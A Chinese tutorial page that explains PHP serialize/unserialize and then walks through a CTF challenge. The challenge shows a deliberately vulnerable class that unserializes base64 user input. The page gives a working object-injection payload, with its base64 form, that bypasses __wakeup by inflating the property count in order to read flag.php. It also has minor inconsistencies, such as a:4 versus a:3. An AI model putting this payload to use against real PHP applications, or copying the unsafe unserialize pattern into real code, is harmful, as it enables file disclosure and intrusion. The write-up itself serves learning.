PHP序列化与反序列化

技术文档网 2021-04-21
序列化 serialization

serialize() ---> 函数用于序列化对象或数组,并返回一个字符串。

<?php
$sites = array('t1', 'tt2', 'ttt3');
$serialized_data = serialize($sites);
echo  $serialized_data;
?>

output

a:3:{i:0;s:2:"t1";i:1;s:3:"tt2";i:2;s:4:"ttt3";}
  • a:表示整体的数据类型,这里是array;

  • a:4中的4:表示数组元素的个数;

  • i:表示int,整型;

  • 0:表示数组元素的下标;

  • s:表示string,即数组值的类型;

  • s:3中3:表示数组值的长度。

serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方

反序列化
<?php
$sites = array('t1', 'tt2', 'ttt3');
$serialized_data = serialize($sites);
#echo  $serialized_data;
$unserialized_data = unserialize($serialized_data);
print_r($unserialized_data);
?>

output should be like this

Array
(
    [0] =>  t1
    [1] =>  tt2
    [2] =>  ttt3
)

put into practice

利用 php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用,比如__construct当一个对象创建时被调用,__destruct当一个对象销毁时被调用,__toString当一个对象被当作一个字符串使用。

一句话解释,用膜法打败膜法

引入例题

<?php
  class SoFun{
    protected $file='index.php';
    function __destruct(){
        if(!empty($this->file))
        {
            //查找file文件中的字符串,如果有'\\'和'/'在字符串中,就显示错误
            if(strchr($this->file,"\\")===false &&  strchr($this->file, '/')===false)
            {
                show_source(dirname (__FILE__).'/'.$this ->file);
            }
            else{
                    die('Wrong filename.');
                }
        }
    }
    function __wakeup()
    {
        $this-> file='index.php';
    }
    public function __toString()
    {
        return '';
    }
    }
    if (!isset($_GET['file']))
    {
        show_source('index.php');
    }
    else{
       $file=base64_decode( $_GET['file']);
       echo unserialize($file );
    }
?>  #<!--flag in flag.php-->

审计代码,可以发现要得到flag ,思路如下:

  • 源码最后提示,flag 在flag.php里面;
  • 注意到__destruct中,有这么一段代码,将file文件内容显示出来
show_source(dirname(FILE).’/‘.$this->file)

作用就是将file文件内容显示出来

  • 若POST“file”参数为序列化对象,且将file设为flag.php;那么可以通过unserialize反序列化,进而调用__destruct魔术方法来显示flag.php源码(要注意的是file参数内容需要经过base64编码);
  • 上面的分析是多么美好,但从代码分析可以知道,还有__wakeup这个拦路虎,通过unserialize反序列化之后,也会调用__wakeup方法,它会把file设为index.php;
  • 总结下来就是,想办法把file设为flag.php,调用__destruct方法,且绕过__wakeup。

PHP反序列化对象注入漏洞

上网查资料,发现原来这个CTF题目是根据PHP反序列化对象注入漏洞改编的。

简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。举个栗子,比如有个Student类,里面有个参数为name。 实际情况:O:7:”Student”:1:{S:4:”name”;s:8:”sqx”;} Payload:O:7:”Student”:2:{S:4:”name”;s:8:”sqx”;} Payload对象属性个数为2,而实际属性个数为1,那么就会掉入漏洞,从而跳过wakeup()方法。

简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。

payload = ?file=O:5:"SoFun":2:{s:11:"\00*\00file";s:8:"flag.php";} 或者 payload = _?file=O:5:"SoFun":2:{S:7:"\00*\00file";s:8:"flag.php";}_

经过base64加密后 payload = ?file=Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ== 得到flag

相关文章

  1. 如何通过xhprof分析性能

    使用方法 xhprof_enable(); /** ... 要检查的php代码 ... **/ $xhprof_data = xhprof_disable(); // 引入xhprof_lib i

  2. LUMEN API Controller 规范

    1. 第三方依赖库规范 在使用LUMEN实现API接口时,以下库必须需要包含在composer包依赖中,以实现代码编写的一些规范 dingo/api : 实现API接口库 vlucas/phpdo

  3. PHP文件锁

    共享锁(LOCK_SH) 什么时候加共享锁? 当在读取数据的时候同时进行着其他的写操作,这个时候需要对文件加共享锁,否则无论有没有对写操作加写锁都会写入成功,导致数据不一致 当文件获得共享锁时,其他

  4. Hello-Risen-程序

    首先需要说明的是,您下载到的文件包含两部分,其中src中是开发源码,用于对Risen框架本身的开发,risen 目录中是通过源码生成的包含debug和release版本的框架程序,用于您应用程序的开发

  5. PHP自定义类示例(Weixin消息解析类)

    PHP自定义类示例(Weixin消息解析类) /** * Created by Qingger. * User: jsspf * Date: 2017/3/24 * Time: 10:50

随机推荐

  1. 如何通过xhprof分析性能

    使用方法 xhprof_enable(); /** ... 要检查的php代码 ... **/ $xhprof_data = xhprof_disable(); // 引入xhprof_lib i

  2. LUMEN API Controller 规范

    1. 第三方依赖库规范 在使用LUMEN实现API接口时,以下库必须需要包含在composer包依赖中,以实现代码编写的一些规范 dingo/api : 实现API接口库 vlucas/phpdo

  3. PHP文件锁

    共享锁(LOCK_SH) 什么时候加共享锁? 当在读取数据的时候同时进行着其他的写操作,这个时候需要对文件加共享锁,否则无论有没有对写操作加写锁都会写入成功,导致数据不一致 当文件获得共享锁时,其他

  4. Hello-Risen-程序

    首先需要说明的是,您下载到的文件包含两部分,其中src中是开发源码,用于对Risen框架本身的开发,risen 目录中是通过源码生成的包含debug和release版本的框架程序,用于您应用程序的开发

  5. PHP自定义类示例(Weixin消息解析类)

    PHP自定义类示例(Weixin消息解析类) /** * Created by Qingger. * User: jsspf * Date: 2017/3/24 * Time: 10:50